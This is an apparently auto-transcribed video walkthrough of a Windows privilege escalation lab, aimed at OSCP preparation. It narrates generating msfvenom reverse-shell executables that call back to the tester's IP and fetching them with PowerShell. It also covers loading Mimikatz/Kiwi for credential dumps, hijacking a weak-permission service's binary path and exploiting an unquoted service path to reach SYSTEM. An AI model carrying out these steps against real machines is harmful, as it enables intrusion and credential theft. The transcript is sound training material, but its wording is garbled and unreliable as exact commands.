So today we're going to be looking at Windows Priv Esc. And yeah, we'll go ahead and take a look at all that stuff, Windows Priv Esc, and see what we can do with it. There's quite a few rooms on it, and we've been doing the office security stuff lately. So I figured, hey, let's do this like right here. Let's try to do some Windows Priv Esc stuff because that has a lot of different Windows things on it. There's obviously 18 tasks here, and they may not all just work nicely. So I haven't done this yet. I haven't tried it yet. So I'm going in this kind of black box also. It does give you like straight up like, hey, this is how you do it. But as we've seen before, that may not always work, especially as things change. So we may have to try to find some workarounds, things like that for different things. So I don't think it's going to be one video. I think it's going to be multiple videos, like right here. If it doesn't take too long, maybe multiple videos wrapped into one on YouTube. But we'll find out. We'll see. So I went ahead and I started the box up already. And I already started the machine. And okay, completed that. We got to log in with X-Free RDP. Let's go ahead and ping it. See if it's even up and running. See if we can ping it first off. So this is a Windows machine. Go ahead and ping. Alright, so we can ping it. Okay, let's go ahead and I'm going to CD into offensive pen testing. Then I'm going to make a directory for Windows Priv Esc. We'll CD into there, Windows Priv Esc. Obviously nothing in here yet. And I also did a little Windows Priv Esc thing over here. So it does have a X-Free RDP thing here. So I'm going to go ahead and copy and paste that. And just kind of do this flag right here. Boom, boom, boom. Control V, there we go. Okay. And so we do have the remote desktop information for this. So it does want us to RDP into it. And we will start off with that. 1010, I believe that was correct. 1010.111.188.116. Alright, you could also use Remina if you want to. You don't have to use RDP. Username is user, password is password 321. That's what that means. We're going to ignore the cert that it has, and we're going to connect to that IP address. Alright, command.exe automatically opens up. And the very first thing it does tell us is, hey, it wants us to create a shell. Now before we even do that, I'm going to go ahead and do an mmap scan on it. Just see kind of, what we're working with here, what type of ports are open, things like that. So remember, we have TACP, TAC all ports, TACPV, very verbose. Timing at 4, one above the default. No DNS lookup, and do not ping. We do have SMB client up and running on here. Let's go ahead and see what we got in that SMB client. TACL. There we go. Let's try that. See if we have any anonymous login with that. This has failed access denied. Okay, I wonder if we actually have something with maybe I believe it's like that. TACU user. Whoops. Maybe it's that, or maybe I always mess this part up. I mess that up all the time. TACU user. I might have to actually know what the share is. Yeah, okay. Yep, that's the wrong way anyways, that's why. So might have to know what the share actually is, or what it's actually called. State password 321. But I can find anything. I didn't think so because there's most likely nothing called user. That's okay though. So the very first thing it wants to do is to generate a reverse shell executable. Alright, so let's go ahead and generate that. So I'm just going to kind of get this guy so he's barely doing anything. He can stop. We can exit out him. We'll keep him open, but let's go ahead and generate that a reverse shell. Right. So MSF Venom, and we'll try to pick that up. So let's go ahead and start up MSF console out here, and we'll do an MSF Venom. And let's go ahead and see what type of Windows we're running here. I should just be able to go to, is it control panel or is it computer management? No, computer. Oh boy. Computer. Do not want to update, I know that much. Get rid of that. Computer management, is it this one right here? Yeah, see if you have a 32 or 64-bit Windows. We're gonna have 64-bit, about 90% positive of that. I think I'm pretty sure, but just because it is 2019, as we can see, there is no firewall or virus threat protection up and running. We do have a 64-bit operating system. So we do msfn tacp Windows. We could do x64 / shell reverse TCP. We could also make an interpreter shell if we want to. lhost is going to be equal to myself. So if I do an ifig, lhost is going to be equal to my IP address, like right here. Remember, that is going to be your tunnel IP address. Outport. There's no firewall or anything like that, so I don't think we're going to have to worry about, you know, like 443 or anything like that. But we can still do 443. We're just going to do 4444. We're going to make this an executable file, and we'll call it shell.exe. Obviously, if this is real life, I want to call it shell.exe or anything like that. Down here, we want to be listening for the same thing. So we're going to use multi-handler. Use multi-handler. Okay. So we got exploit multi-handler. We can set the payload to the same thing that we have up here. Windows x64 shell reverse TCP. We can set our lhost to the same thing that we put up here. All right. Or you can also set ton 0. Or you can just start typing in 10, hit tab, and it'll go through. Set our L port to 4444, which most likely already is. And we can go ahead and do a runtac J, so that will run in the background. Alright, so that has just been sent up, or we just created the shell.exe. Now we need to download that shell.exe, right? Let's go ahead and see this guy have, yeah, he does. He has Internet Explorer. Okay, let's go ahead and see if we can download that. So we'll do a Python tac-m. Well, let's do a Python 3. HTTP server, we'll say 80. Now I also have to get my IP address again. I have config. Alright, and we're going to go to this IP address on this computer over here. Whenever I was able, like whenever I was taking CCPT or whatever, anything like that, whenever I was able to remote desktop into something, I always tried it. That would be the very first thing I always tried, was either A, to create a user and be able to remote desktop, run get GUI from interpreters, things like that. But yeah, whenever you can get a remote desktop on Windows, it obviously makes your life much easier, because that's how Windows likes to be used. You know, it's through a GUI interface, so I would highly suggest it. Okay, so it just got shell.exe. Cool. You're attempting to download a file from a site that is not part of trusted sites. Alright, let's learn more. Can we just like say I don't care? Can we do something like that? Can we go to the site? How about that? Can we go to that site? And then click on shell.exe? And then maybe tell it like, adding this website to trusted site zone with lower security setting for all content. Okay. Let's go ahead and just, you know what? We could try to use PowerShell like right now. Do a web invoke, right? Or a wget, tac URI. Could do something like that. Actually, let's see if PowerShell is actually on it. Let's actually try that like real quick, because we have been using PowerShell lately. So let's go ahead and try that, and let's see if we can do a, what is it, wget. Let's see if wget works first off on here. Wget is an alias. Okay, it does. So let's do wget. I have to remember how to do this now. Tac URI HTTP, and then the website 10. Oh boy, Control V doesn't work. Right click doesn't work. Alright, cool. I have config 10.13.26.24, 10.13.26.24, and then I think slash shell.exe. I think I have to do an out file, if I remember correctly. Out file will say shell.exe. And this is going to be in C users user. I don't know where that's actually going to be at. If we do dir, is that sitting in there now? It is shell.exe. Can we now run that? Do a period slash shell.exe. And we can, and I do get a shell open back here. So we were able to do that through wget tac URI, capital U, RI, in case you're watching on a phone here. HTTP, the IP address for my tunnel, right, my ton 0 IP address, slash shell.exe, because that's the file I'm trying to get. And then the out file, what are we going to call it? Shell.exe. Right, so that did work like right there, so that's pretty cool, and obviously shows that, hey, learned some stuff from what we've been doing so far, because I know that you can do an invoke web request, and I think it's the same exact thing. So let's try to do a, let's press home and do, I believe it's invoke tac web request, like that. I think that's how you do it. QUEST, and then we'll just call this one like shell 1, I guess. We'll try something like that, see if that works. Okay, dir. So that does work also. So invoke web request, but an alias for invoke web request is wget. So we've now got that service over there, at least, right? Let's go ahead and say, hey, yeah. So we made a shell.exe. Let me go ahead and show what that shell.exe actually is first. Boom, boom. Okay. We use the RDP and computer management, yeah, to see what version of Windows we were running, x86 or x64. And made a MSF Venom from there file, not really script, is it, file from there. Alright, so then we did that. So now we're up inside the system and everything, and we now have our shell opened up. So it created a little bit of persistence if we were to have that guy run, you know, every time the window, or every time Windows started or the computer started or anything like that. If we had that guy run, that would start to create that persistence and everything. Let's go ahead and hop into that shell 1. Or actually, let's actually search for shell 2. You can find the shell 2 interpreter. Use 0. Show options, and we can set that session like right there to 1. Notice the L port is 4433. It's because usually using 4444. So I like how they do that, where they're not going to try to use the same L port, because then it's like, hey, that's already listening. You can't do that. We can set the session to 1, and let's go ahead and say, hey, run that. Let's see if we can actually get an interpreter session from the shell. So it's going to try to upgrade this shell session to an interpreter session. It says post module execution completed. It might take a minute. If it does work, it might take a minute. Sometimes it just doesn't work at all. We can do a show sessions tac I, right? And we still, okay, or we can just do a sessions tac I, and we still only have that one session like right there. That's okay. We can always create another file. Also, we can do a interpreter file up here, right? So we can say, hey, MSF Venom tac p Windows x64, or we can just say Windows interpreter. Alright, thank you very much. Windows, we say interpreter. Oh, what we got down here? Got something? Nope. Windows interpreter reverse TCP. Alright, and the local host is going to be 10.13.26.184. We say local port 6666. Sure. Executable, and we'll call that. Let's actually call that met.exe. So now we'll make an interpreter reverse shell if shell to interpreter does not work. Now this could also be, I mean, it could be blocking it. There could be a lot of reasons why it doesn't work. Could just not be reacting properly. So we're going to go ahead and we're going to try to throw that. I'm just going to try to delete the shell 1. Oh man, come on now, big guy. Not doing that. Shell delete. Please stop. Delete shell 1.exe. Okay, cool. I think you can also do an ls on these guys too. You can't do it like an ls tac la. Okay, so let's go ahead and throw this MSF Venom at now, right? This new interpreter shell we're gonna try to get. You notice I did not do x64 that time. You cannot, especially when it's 64-bit. You can run both 64 and 32-bit. Let's go ahead and do a Python 3 server again, port 80 there. Grab my IP address again. We'll hop back over into our PowerShell. We'll do a wget again, and this time we're just going to wget for. We'll call this met.exe, right? And this time we're just going to go ahead and get that met.exe. So remember, we're doing invoke. This one's invoke web request 1. Same exact thing as wget tac URI HTTP my IP address followed by the file name out file. What are we going to call it? Once it gets over this Windows system, as we see, we just got it. We can do a dir or an ls, and we see we have that met.exe. Let's go ahead and use exploit multi-handler set the payload to Windows interpreter, right? Reverse TCP. Remember, now we are now using this one, right? We set our out host to us again, set our out port to 6666, and we can go ahead and do a run pack J. So that'll run in the background. Now we can try to run this guy over here and see if we get an interpreter shell. // met.exe. And we'll hop back over here, and we have interpreter session 2 open. Alright, so from here we can just say shell to interpreter was not working, so we sent a interpreter shell add it through Venom. Okay, so now we have that, so we do a session 2, and we now have an interpreter shell. Okay, we do a get UID, and we are user on here. We try get system, maybe an easy win, you never know, get system, and nothing. Okay, so we were just able to just get that easy win for get system. We try load Mimikatz, or Kiwi, or, you know, just gonna load Kiwi anyways. Load Mimikatz, okay, cool. So we can do load Kiwi. See how it says load Mimikatz on newer OS, but did you mean to load Kiwi instead? Success, okay. Once we do that, we do question mark. We try to do a LSA dump secrets, LSA dump SAM. You guys saw me do this just the other day. If you were watching those streams, I'm obviously not running a system. We can try creds all. A lot of stuff we can try here, but a lot of stuff isn't going to work if we're not system on this machine. So now we got to start upgrading, right? So we generated that reverse shell. We did that. Boom, that's completed. All right, we did it a couple different ways. They got a shell. We did it a few different ways. We did it through, they have it through an SMB server, so you can follow this one like right here. We did it through interpreter. I'm just going to go ahead and print screen this actually and just put this on that guy also, just so I can see how to do it through an SMB server. Alright, cool. From here, it says service exploits insecure service permissions. Alright, cool. So let's go ahead and look at that. Insecure service permissions, right? Service exploits, then we'll say insecure service permissions. Alright, cool. So let's go ahead and look at these insecure service permissions. Use accesscheck.exe to check the user account's permissions on the DACL service SVC service. Okay. So that's going to be in C drive Priv Esc access check. I wonder if I actually have some of that. I wonder if I can do a locate access CHK. No. Okay. So let's go ahead and type in shell down here, and we'll do a CD and a C that's dir. Let's see what we got here. There's Priv Esc, but I don't want just a full CD and a Priv Esc. So he's got power up, so I feel like accesscheck.exe should be something that we can get, because he's got power up in here. We have print spoofer, procmon. Let's go ahead and try to find that. Let's try to locate that one more time. No, okay, let's go ahead and try to find that on the internet then, so we can actually change to English. Okay. There we go. Windows Priv Esc escalation. Windows Priv Esc, boom, boom, okay. I want to actually download. Or is this like an actual doc access check? Windows System Internal, the command line tool for viewing the effective permissions on files, registry keys. So it's like a Windows internal tool. Installation, access account program, copy access check under executable path on the access check. Oh wow, look at that, huh? So it's a account program. Then we can download it. We go ahead and download it, and I'm just gonna save it. Okay. And we can probably actually, yeah, I'm just gonna save it to myself here. We'll go ahead and move from download access check .zip to right here, and now I have it over here. I could probably unzip it. Unzip access check, And we get the access check.exe. So I wonder if I can send that file over to here. Let's see if I can CD that back. Because in real life, they may not have access check on there. So let's go and CD into users. It should be user, CD into user now. And let's go ahead, let's see if we can do it with PS or PowerShell or something like that. PowerShell. Can we do something like this? Okay, so we're now PowerShell. Can we do our wget again? Select URI. So we have access check now, right? So tech URI HTTP. They go ahead and do right here. Never mind. Slash access checks. Now we can bring that file over here, right? And then we'll say, hey, tech out file here be called access check.exe. Now, I don't know, since this is already on there, if we're gonna mess something up here, because the file's already saved onto it, you know. So let's go ahead and type in access check.exe, and I feel like it should load this link right here. I don't know why I just did that. That was stupid, actually. Okay, so let's go ahead and do a shell again, and then within our shell we can do that, because I did not put a period or slash or anything like that. But within our shell we can do that, and as if we were in PowerShell, we went back into just a regular shell there. That's what I just did. And yeah, it looks like it loaded up access check, and I feel like it should be loading it from users, because it shouldn't just be able to just, oh yeah, yep, we found it. So cool. Okay, so we got that now. So, oh, my son just yelled cool too in his bedroom. He's supposed to be sleeping, but no, because he's in there screaming cool. He shouldn't be able to hear me. Maybe he's got me on stream. Alright, so we did that, right? And then we had to accept EULA user DACL service. So now what I would like to do is see who are the different users, right? Because that's not really, so I know that Power View, I believe it is, can actually give us the different users and stuff, correct? That gave us file share, login credentials, Power View, sharphound. Get 80 user SQL service. I think we just do get 80 user, login credentials, Power View. I could have swore that we did something with finding users before. Or looking at all users or something like that. I don't know. Power View, maybe it was in here. Password needed. Okay, Power View. Getting that group name star. So that's going to show me all my groups. Well, I'll get 80 user filter. Okay, so get 80 user, and that'll show us all of our users. So I'd much rather get the 80 user than trying to just say, oh yeah, this guy exists. So let's go ahead and do that. So let's go ahead and go back into PowerShell, and then we'll do a get 80 user. I wonder if I can do that. Hit enter. Okay, nope. And what does it say? Term get 80 users now recognized term name of command line. Okay, so let's go ahead and load in, I think, Power View. Power View. We'll go ahead and get that over into there. So let's go ahead and copy Power View PS1 right here. And I showed how to do that before. We just try to locate though Power View. We can see how we have quite a few of them. And if you do it like this, Power View, we can see how we have a bunch of stuff there. It's also .ps1, so it is case sensitive whenever you do locate. Okay, so we do find that one. But I had it in the folder right before this one, so I just copied it into here. And we're going to go ahead and do another wget, tac URI. Because I don't know, I just feel like, I know that all this stuff's already on here. We already have Power View, we already have this access check and everything. I just feel like we are skipping a lot of steps. Wouldn't be doing the video justice, I feel like, if we didn't do it like this. I wouldn't be doing myself justice, you know, and learning as much as possible about everything. Okay, now I should have to do a PowerShell EP bypass, right? That's what I have to do. Yeah, so we're going to go ahead and exit out here. Exit out this PowerShell. And we're going to type in PowerShell tac EP bypass. Okay, now we're back into PowerShell. And as it says like right here, this is the loaded PowerShell with execution policy bypassed. So that's what we're doing like right there. Now we're going to go ahead and import that PowerView module. Alright, cool. We got that. If I do directory, obviously we have quite a few things in here now. We've now loaded all these things into here. Probably should have made my own folder. Alright. So now what we're going to do is, it looks like we're going to do that get AD user, right? Get tac AD user. Let's see if that works. Just with just that. Shift follow program, check the spelling. Get. Oh, let's try get tac AD. Does it have to be capital? No. Get AD user. I mean, there's another way, like right there. Try to do get net user. Maybe it's not. Maybe it won't work with this one, like right here. Yeah, he's saying that he can't do it either, huh? What I'm doing again. Get AD user, can't do that one. It's really weird. We've done it before, obviously. Attack filter star, maybe. Maybe we got to put in that whole thing. Yeah. The term get is not recognized as a name of commandment. So I don't know if we're gonna be able to do that. I wonder if we do a get net group. Get net group. Filter, what is it? Tag group name star? Never mind. We did get that to work, right, PowerView? I mean, I didn't see any errors. I don't see any errors, but usually it doesn't come back like that also, though. So you may actually just not be able to use PowerView on this guy. I don't know. What about power up or power? I don't know. PowerView PS1. I wonder if I messed up whenever I did that out file, because I didn't make capital or anything like that. Let's go ahead and delete PowerView.ps1. Whoopsie daisy. And then from here, what we'll do is we'll go ahead and we will. Oh, she's getting walking out as Boba Fett. Can I play the music now? Do you get a do? Can't everyone be Darth Vader if you really want them all to be Darth Vader? No. I feel like it really depends on what's in your heart.
Look at the back, though.
They're tight. Those are tight. Those are very tight.
Yeah.
You get to wear like shorts or something like that with it because you can see right through it.
Yeah.
I guess like whenever you're walking around, I could be like behind you playing music, like booty, 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 rocking everywhere. Let's see here. So we. So let's see here. Let's go ahead and re-upload it, right? So we'll go ahead and do another wget tag URI HTTP. Boom, boom. 90% of you who have already left the video by now. That's good. I'm learning. Slash PowerView.ps1 tag out file. Out file's gonna be like that. This shouldn't matter. This should not matter at all. But you know what? You never know. Okay. Now we'll do our period slash power review.ps1. Whoops. I guess I could just do a period slash.
What am I supposed to do?
Just wear shorts underneath it.
Underneath of it?
Yeah. Like some like.
Underwear on.
Yeah, but you can see like right through it though.
What color underwear am I wearing?
It looked like black. I mean, you can see like pretty much like the whole outline of it all. So you should. I mean, I'd wear. Yeah, something like that.
I feel like the back was dumb. Like it's all effort in front and then nothing.
I don't know. Whatever. They're fine.
Except for hoping that would cover it, I guess.
Alright, let's see here.
That's a little ridiculous.
So, we did our power review.
See this late?
No. We can go ahead and do we can try any of these commands that we want now. I guess get net group name star. Try some of that. There may just not be anything on here. All honesty. Well, I should be able to see the AD users though. And I should be able to see, like I should be able to do get AD users and things like that. I should be able to see all that stuff though. So that's what I'm kind of confused about, like right there. Yeah, let's see. So I really don't know how we do this without getting this total, because I should be able to do at least get AD user. And nothing's coming up. It's just not recognized. So alright, I guess we're just gonna go with you know, this is a service, but it is a user service. Note that the user account is the person who changed the service config. So I wonder if we can do a how to get services, how to get C services with PowerShell. How to export Windows services. List using command line, get service, and hit enter. Okay, try that. Get service. Okay, so there's all that, right? It was in the D, right? But this is a user service. I don't know if this is actually going to count at all. There it is, DACL service, DACL service. That's which one it wants us to use. Now, would I've just been able to just find that, you know, without actually saying, hey, we're going to use DACL service? No. No, not at all. So use PowerShell generate, yeah, get service where status tech equals status name display. Open elevator, get service, and hit enter. You'll see a list of services available. Okay. Running equals stopped. So export the list. Okay. So I guess we were able to export the list and, you know, and actually sit there and actually really look through it. But let's go ahead and continue on here. So I'm just gonna. I don't know if I'm going to put that one even in there. We're just going to go ahead and continue on here. On task 3 still. It's been like an hour in. We're on task 3. I don't think it's been an hour. Let's see here. It's been 33 minutes. That's not bad. Okay. What's the original binary path name of DACL service? Okay. So create a service and note that it runs with system privileges service start name. So let's go ahead and check out that. Let's go ahead and check out the privileges first. So we're not going to do all that. The access check that you actually accept. Okay, we will do all that. We're just going to do from here over, I guess. I don't know what the heck that UWCQV is. Kind of wish it would have told us, like, hey, what does each one of those mean? I'm sure we can figure it out, but let's go ahead and try this. So that's going to be a shell, actually. Okay, let's see here. U is suppress errors. UC is name is Windows service. Okay, UC, what was it again? It was UC UWCQV. W, show only objects that have write access. Q is nobody knows. Q doesn't exist, okay. And then V is probably verbose. There we go. Alright. So accept ULA. Okay, reports. So we have read and write. Alright, so that's how we figure that out. Well, obviously we're using for user DACL. Or if we can just do a and then get rid of that. And if it'll show us everything. No, of course not. Or if we can do that and then a star. User. We can do a star on it, and a star will show us, hey, what do we have read and write access to? When we get that, now we can start to look at stuff. Okay, cool. Cool. So now, that guy like right there can now tell us like, hey, this is what you have access to. Now we start to break it down where it's not just, you just need to know, you know. So, okay, cool. Much better. Say Control V. Notice we have DAC access to service DACLSVC. Okay. Let's go ahead and query the service and note that it runs with system privileges. Go ahead and do that. Say SQQC and then the service name. So queried it. What? How do we know that it has system privileges? Because the service star name is local system. How do we know? Modify. Okay, query the service and note that it runs with system privileges. Service star name. Yep. Okay, so it is service star name, and we have local system. Okay. So there we go. So we'll say it runs with system privileges due to local system. Runs with system privs due to local system. All right, cool. And then we have modify the service config and set the binary path name, bin path, to the reverse.exe executable you created. Oh, really? So we're going to need another one of these. I'm actually using the one from interpreter. So we'll create another MSF Venom script. MSF Venom. TAC-P. Windows. x64. Shell reverse TCP. Yep. 10.13.26.24 is correct. We'll say local port. We'll say is 8080. Okay. It's gonna be an executable, and we'll call this reverse or rev.exe. And we'll go ahead and go into here. Go into PowerShell again. And we'll do a wget tag URI. Now we're doing this a lot, huh? Today. HTTP / rev.exe tag out file is going to be rev.exe. We have done this a lot today. We do dir. We have our rev.exe like right there. Okay, cool. Let's go ahead and print screen this. Okay, we'll go ahead and show that we moved him over here, right? Hi, Marceline.
Hi.
Okay, and then from here what we'll do is we'll go ahead and get our back into our service exploits, and we'll do our, what's up?
Nothing.
Okay. Go. Thank you. Yep. As long as you don't fall on the flat ground, yes. Alright. We have modify the service config, set the binary path name, seconfig, DAC, bin path, to, and then we can change it to reverse.exe. So what we can technically do, it looks like, is we can actually change it to like where we are, like right here, right? So let's go ahead and exit out here. So we're actually in C, users, user. So we say slash, it's actually going to be C users / user / rev.exe. I think that's what it's telling us to do, like right there. I'm going to try that. says it was successful. So print screen. So let's go ahead and change binary path to rev.exe. Okay, let's go ahead and actually start up another Control Z. We'll background this guy, background him, and use exploit multi-handler. We'll set the payload to Windows Shell x64 shell reverse TCP. This could be a stage payload. Alright, we will set the L port to 8080 and runtime J that. So that's going to be running in the background. Session stack I, going into shell or session 2 again. Go ahead and get in that shell again. And we can, let's see here. So start listener on Kali, then start service to spawn reverse shell running with system privileges. So net start. So it was shut down, right? We looked at it the very first time we saw it, it was shut or it was off or whatever. It was not up and running, remember? So now we just need to start the system back up. Service start, it looks like something like that. And we do net start. Okay. So let's go ahead and do that. And we're getting a reverse shell on there. Command shell session 3 opened up. So cool. Now is that going to be stable? I don't know, but we did get a reverse shell on there. What was the original binary path name? That's a good question. So we have that. Boom, boom. Okay. Now start your listener and obtain a reverse shell by starting the DACL-SVC service. If the service is already started, we will first need to stop it and then start it. There we go. And it looks like if we do Control Z, yes, it looks like we can do background that again. We can say session stack I, and we do have our session 3 open. And I wonder if we can actually do a shell to interpreter. Let's search for shell 2, use 0, and we'll do session 3. Let's try to run that. Oh, whoops. Control Z, yes. Set session to 3. Let's try to run that and see if we can get an interpreter shell with this guy. I like the interpreter shells, especially for something like CCPT, because it allows you to more easily, within the internal network there, be able to put in things like your proxies and everything, and your ARPs and requests and everything like that. It allows you to be able to do stuff like that more easily. So what is the original binary path name of the DACL service? I feel like that's going to be up in... So binary path name is that. C program files, DACL service, DACL service.exe. Alright, cool. So we have, next one is going to be service exploits unquoted service path. So I think I've showed this once before, but not quite sure. I have shown this one before. This one's actually using unquoted path service. And then we have, I only like how this one's actually teaching it though. I have used this one before. I'm not really liking how it's teaching it, because the ones before we actually did it like, you know, it was with, I forgot what file it was with, but I know I have other ones that actually show unquoted service paths. So where is that's print spoofer, power view, that's not gonna have it in there. No. Yeah, there's much better ones for unquoted service path. And I think we actually use power up or like a win piece for this, some of that. And I think I'm going to do that now. I think I'm actually going to get WinPs on this machine too. So let's go ahead and copy over WinPs. We'll go ahead and copy. Let's go ahead and locate WinPs first. Locate WinPs. Okay. So what about WinPs? No? Let's go ahead and copy from Priv Escalation Officer script WinPs. WinPs.bat, WinPs.bat's right there, okay? And then from here we can go ahead and do a upload WinPs.bat. This is another way to be able to upload something instead of invoke request and everything. We just upload like that. Shell, and we can do WinPs.bat. And this will also tell us like uncoded service paths. I think we can also find it in here too. So program files, DL hijack, DL hijack, NTS system authority. So service binary permissions with WMIC and ICACL. So yeah, this light agent one, like right here, this one like right here is what I've done now before for uncoded service path. We also have a DL hijack. It looks like in here. We're gonna have a bunch of stuff that we find. Uncoded service path. Here we go. The path not quoted. Soft new folder.exe. Windows will try to execute the first cprogram.exe. Right, then C program files, soft new.exe. Okay. And finally, boom, boom, execute.exe. So let's get try to do program.exe, new.exe, then we'll finally do that. Try to create a C program file, soft new.exe, which will put a file in here, and it'll run that new.exe. So that's pretty much going to happen here. So that's uncoded service paths, right? So AWS light agent, I've done this one like right here before. Invalid parameter files, okay. Boom, boom. I'm just trying to find right where this is actually at. Uncoded service, there it is. So we have a C program files, uncoded path service, common files, uncoded path service.exe. So this is going to find the specified file. Okay, so we could definitely put something in here. Invalid parameter files / unquoted. So we could probably do something in like unquoted.exe. path.exe, common.exe, we could try something like that. So WinPs.bat did find it. It's going to find a bunch of other things also. But it did find it like that. That's actually probably why we're using common.exe, because if we look back up here, where was that unquoted service path at? Right here. Perf unquoted service path. It went to common files. So that's why we're using common.exe, because it's going to stop it right here. Alright, so let's go ahead and try to run that, guys. Let's go ahead and make an MSF Venom. Right? And I'm going to go back over to this guy over here. And we're going to say unquoted service paths. Unquoted service paths. Alright. First thing I'm going to do is show that I did use WinPs. So we have WinPs up and running, right? Boom. We find this unquoted service path. Trust and install unquoted service right here. Alright. Actually, let me go ahead and it's got way up there so I can try to show this whole thing. There we go. There we go. Print screen that whole thing. Boom. We may be able to put a common.exe in common files. So let's go ahead and create another reverse shell, right? MSF Venom again, right? MSF Venom. Attack P. We can do a Windows shell reverse TCP, however you guys want to do it. Lhost K. We'll do L port. We'll say is 1111. And we'll call this one common.exe. Let's go ahead and try this like real quick. I'm also going to move this stuff over too because I don't really need to see that. Yeah, we're getting all that stuff. But you guys need to see this stuff. So let's go ahead and try that like real quick. We'll do another. We can upload. We can really however we can do it. Good thing we have like 12 different channels open here. So we can go ahead and cd into wherever that path was, like right there, which was C program files. I hate trying to cd in program files, so actually just could do shell, and we'll cd into program files like that. dir cd back to c that program files. Okay. Then from here we can go into unquoted path service. So let's go ahead and just copy that. So we'll cd into there, cd unquoted path service, and then we'll cd into common files. So if I do a dir in here, I should be able to see a common files, right? And I do. Let's go ahead and cd into common files, and then from here we'll go ahead and background this guy. Now if I do a pwd over here, oh, it did not go all the way through. It should have. I figured it would have went all the way through. So we can either do some PowerShell or something like that, but we can try to do a cd and see that. That's not going to work. What? It's not going to work. Yep, I didn't think so. Yep, program slash files like that. There we go. Now we can cd into unquoted path service. Now we can go ahead and upload that common.exe. Or we could have did PowerShell again, did wget and everything like that, how we have been. Now from here we can do we can just start up a reverse listener also. So we can also just do a nc lvmp 1111. Alright, but we could also background this and do a run tag j with exploit multi-handler like we have been. So let's go ahead and he put in the unquoted path service. They did common.exe. I'm going to put in common files first, and then we'll go ahead and we'll try to put in unquoted path service. I think that he's most likely right. Like, you know, go into a shell. Okay, looks like we're in the right place. And we actually did get a shell, like right there. It's not good. It's no good, like right now. But we did get one. Let's go ahead and stop that shell. Get back into a shell. Let's go ahead and do a, actually Control Z, yes. Control Z, yes. Let's go ahead and actually do a use exploit multi-handler. At least we know that we do get that call back. Set our L port to 1111. We'll go ahead and run tag j that. Sessions 2, shell, and go ahead and start that guy up. So Control Z, that started up. Control Z, yes. Control Z, yes. And we have a sessions tag I, and we do have a session 4. Sessions 4. Who am I / privs. Probably because it's who am I / priv. Oh my god, I was doing real good, huh? Who am I / priv, and we see that's my privilege information. I just want to see who am I actually. Why am I doing all this? Who am I? NT system authority. Okay, cool. And there's all of our privileges. So now we can do more stuff. So that was good. We did real good with that one. I like that one a lot. Especially since we didn't really follow it the exact way. I don't think. Yeah, no, okay, we did. We uploaded it into unquoted service path.exe. Because then it would be count files. So, you know, that is correct. Okay. So let's go ahead and get that. Common.exe. Boom. And then we'll go down to unquoted service path. CD into unquoted service path. Upload common.exe. Okay, make a shell. That's our unquoted service path. And we have this like right down here. make sure your listener is ready. And we have that down there. So we've now done a couple of them. What is the binary path name for the unquoted server's path? We should actually be able to see that from the beginning up top up here, right? If I load it up with WinPs, so am I going to actually be able to see it is the real question. I think I can still. Even with WinPs, I think I can. So I still see like C, whatever. Unquoted server's path, common files. Yeah, it should be this whole thing right here. So we should still be good. Alright, cool. We have service exploits weak registry permissions, which it's been close to an hour now, I think. How long has it been now? 45 minutes, an hour? Close to an hour, 55 minutes. So I'm going to go ahead and we're going to cut it off like right here. We've done tasks 1 through 4. There's a weird gnat thing flying around me, kind of pissing me off. And yeah, then from there we'll come back probably tonight, tomorrow, stuff like that. And these ones will all be getting released in December also, all these videos like right here. So they'll be released pretty much as soon as I make them, pretty close to the same time that I'm making them, because OSCP did just change to more Active Directory stuff, so I just want to make sure that people have as many resources as possible with Windows Priv Esc. And I like learning more red team stuff and Windows Priv Esc, things like that. I've been having a lot of fun learning that, so it's also a lot of fun for me too. So if these videos come out much faster than other ones I've done in the past, don't get butthurt about it. It's just mostly because of the OSCP, and these are a lot of fun to do. I feel like Prince Spoof is going to be on OSCP for some reason. I don't know why. It's because it's a newer attack. Rogue Potato, past the hash maybe. I feel like no. Always install elevated. I always think that that's somewhere just because it's just hard to find. Always install elevated. You have to actually like put in that HKLM registry thing and then see the 0x10 or whatever it is, 0x01 whatever it is. But yeah. So now that OSCP is also moving more over to Active Directory, I feel like they should open it up for more a bigger attack surface. Like when I say that, I mean like you should be able to use more tools, I think, now they're doing more Active Directory stuff, because I feel like you need to have some type of command and control system, the C2 systems, whenever it be Covenant, Empire, Meterpreter, Metasploit, whatever you want to call it. I feel like there should be something where you're allowed to use those during the, maybe not like the exploits within them, but you should be able to create MSF Venom, have that exploit runner going, and then do like a shell to Meterpreter. You should be able to do get system, stuff like that. And if it works, it works. They can make it obviously like this guy right now where get system doesn't work, and from there you can start to use different things. I feel like they need to really come out and actually say like, hey, this is what you can and cannot use during Active Directory. But that's just me. I'd be asking a lot of questions during the Active Directory part. What can I use and what can I not use? Because there's a lot of automated tools out there. Am I allowed to use PowerUp PS1? Is that like the same thing as LinPs? If I was allowed to use LinPs, am I allowed to use PowerView? Am I allowed to use Bloodhound? That's a real big one. Or SharpHound, since it is an Active Directory network and you have, a few machines in there. Am I allowed to use Bloodhound and see things like that? So I think they really need to actually, instead of just saying like no automated tools, like how they always said like just nothing that will automatically do the exploit. Like, okay, it's cool and all. There's Python scripts out there I just grabbed from the internet that automatically do the exploit, but those are perfectly allowed. No SQL map. Okay, that meant no SQL map. I think they really need to come out now and actually say like, hey, you cannot use these following tools. You can use these following tools. These are the following tools that we suggest you use. But that's just me. Tell me your thoughts on it. And yeah, I hope you guys have a good one. And I will see you either later tonight or tomorrow. So have a good one.